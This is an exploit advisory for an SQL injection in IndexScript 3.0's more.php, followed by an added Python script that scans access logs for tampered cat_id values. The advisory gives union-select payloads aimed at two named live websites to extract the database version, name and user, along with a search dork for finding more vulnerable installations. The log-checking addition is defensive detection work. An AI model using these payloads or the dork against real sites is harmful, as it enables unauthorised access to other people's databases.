IndexScript 3.0 SQL Injection Vuln

[o] IndexScript 3.0 SQL Injection Vulnerability
Software : IndexScript version 3.0
Vendor   : http://www.indexscript.com/
Download : http://www.indexscript.com/download.php
Author   : NoGe
Home     : http://antisecurity.org

[o] Vulnerable file
more.php

[o] Exploit
http://localhost/[path]/more.php?cat_id=[SQL]

[o] Proof of Concept
http://texxsmith.com/directory/more.php?cat_id=-3+union+select+1,2,3,4,5,version(),database(),user(),9--
http://www.internetkatalogen.net/more.php?cat_id=-77+union+select+1,2,3,4,5,version(),database(),user(),9--
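
Added example (not part of the original advisory, and not IndexScript code): a log check a site operator can run to find requests to more.php whose cat_id is not a plain integer, which is the shape of the proof-of-concept requests above. The combined log format, the client addresses and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); client IPs are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2010:10:00:01 +0000] "GET /directory/more.php?cat_id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jan/2010:10:00:07 +0000] "GET /directory/more.php?cat_id=-3+union+select+1,2,3,4,5,version(),database(),user(),9-- HTTP/1.1" 200 4980 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jan/2010:10:00:09 +0000] "GET /directory/more.php?cat_id=7%20UNION%20SELECT%201 HTTP/1.1" 200 4980 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2010:10:00:12 +0000] "GET /directory/index.php?cat_id=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"
203.0.113.8 - - [10/Jan/2010:10:00:15 +0000] "POST /directory/more.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# client IP, then the method and request target from the quoted request line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')


def suspicious_requests(log_text, script="more.php", param="cat_id"):
    """Return (client_ip, decoded_value) for requests to `script` whose
    `param` is present but is not a plain non-negative integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        ip, _method, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/" + script):
            continue
        # parse_qs decodes %xx and '+', so encoded payloads are checked in clear
        values = parse_qs(parts.query, keep_blank_values=True).get(param, [])
        for value in values:
            if not re.fullmatch(r"[0-9]+", value):
                hits.append((ip, value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip}\tcat_id={value!r}")
```

The same allow-list rule (digits only) is what more.php should enforce on cat_id before it reaches the query. Parameters sent in a POST body do not appear in the access log and are not covered by this check.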

[o] Dork
"powered by IndexScript"

Comments

labatterie said…
Very nice tutorial my dear...